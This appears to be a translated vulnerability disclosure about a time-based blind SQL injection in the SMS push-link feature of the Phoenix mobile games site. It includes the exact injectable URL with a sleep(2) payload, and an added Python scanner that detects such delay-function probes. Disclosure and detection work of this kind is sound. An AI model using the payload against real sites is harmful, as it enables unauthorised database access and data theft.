Brief description:
The 凤凰手机游戏网 (Phoenix mobile games) site has a blind SQL injection vulnerability in the feature where a phone number is entered to send a push link.
Detailed description:
URL affected by the blind SQL injection:
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
The mysql system database is visible, so the user's privileges are probably quite high.
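
A defender-side check for the request shown above, as an added example that is not part of the original report: it decodes each query parameter and flags time-delay functions and a gameid that is not a plain number. The rule that gameid must be purely numeric, the function names and the sample request list are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Time-delay functions typical of MySQL time-based blind injection probes.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Assumption: a legitimate gameid is a plain decimal identifier.
GAMEID_RE = re.compile(r"\d{1,20}")

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    findings = []
    # parse_qsl removes the first encoding layer; decode_fully removes the rest.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = decode_fully(raw)
        if DELAY_RE.search(value):
            findings.append((name, "time-delay function in parameter"))
        if name == "gameid" and not GAMEID_RE.fullmatch(value):
            findings.append((name, "gameid is not a plain number"))
    return findings

def scan(requests):
    """Map each flagged request to its findings; clean requests are omitted."""
    flagged = {}
    for url in requests:
        findings = inspect_request(url)
        if findings:
            flagged[url] = findings
    return flagged

# Constructed sample input: the first entry is the request from this page,
# the other two are made-up requests for comparison.
SAMPLE_REQUESTS = [
    "fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1",
    "fenghuang/game/game_send_sms.jsp?gameid=130221346000&mo=1",
    "fenghuang/game/game_send_sms.jsp?gameid=abc&mo=1",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_REQUESTS).items():
        print(url, findings)
```

The same numeric check applied server-side, together with a parameterized query, removes the injection point rather than only reporting it.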